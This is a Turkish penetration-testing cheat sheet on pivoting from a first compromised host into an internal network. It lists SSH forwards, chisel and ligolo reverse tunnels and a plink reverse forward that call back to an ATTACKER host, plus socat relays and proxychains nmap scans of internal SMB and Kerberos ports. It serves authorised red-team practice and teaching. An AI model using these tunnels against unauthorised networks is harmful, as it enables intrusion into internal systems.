Skip to content

Tunneling and Port Forwarding

generic pivot

İlk shell genelde izole segmenttedir. Tünel ile iç servislere (AD, DB, RDP) kendi makinen üzerinden erişirsin.

  1. Pivot host’tan iç ağ ve dinlenen portları keşfet.

  2. En az bağımlılıklı tüneli seç (SSH varsa SSH; yoksa chisel/ligolo).

  3. Local/remote/dynamic forward ile hedef porta ulaş.

  4. Proxychains/SOCKS ile araçlarını içeriden çalıştır.

Terminal window
ssh -L 8080:10.0.0.5:80 user@PIVOT
Terminal window
ssh -R 443:127.0.0.1:443 user@ATTACKER
Terminal window
ssh -D 1080 user@PIVOT
Terminal window
ssh -L 445:DC:445 -L 88:DC:88 user@PIVOT
Terminal window
./chisel server -p 8080 --reverse
Terminal window
./chisel client ATTACKER:8080 R:socks
Terminal window
./chisel client ATTACKER:8080 R:445:10.0.0.5:445
Terminal window
sudo ip tuntap add user $USER mode tun ligolo
Terminal window
sudo ip link set ligolo up
Terminal window
./proxy -selfcert
Terminal window
./agent -connect ATTACKER:1160 -ignore-cert
proxy: session → start tun
Terminal window
socat TCP-LISTEN:8080,fork TCP:10.0.0.5:80
Terminal window
# Windows
.\plink.exe -ssh user@ATTACKER -R 443:127.0.0.1:443
Terminal window
proxychains nmap -sT -Pn -n -p80,445 10.0.0.0/24
[ ] iç hedefler listelendi
[ ] tünel ayağa kalktı
[ ] local port ile servise erişildi
[ ] proxychains/SOCKS ile tarama yapıldı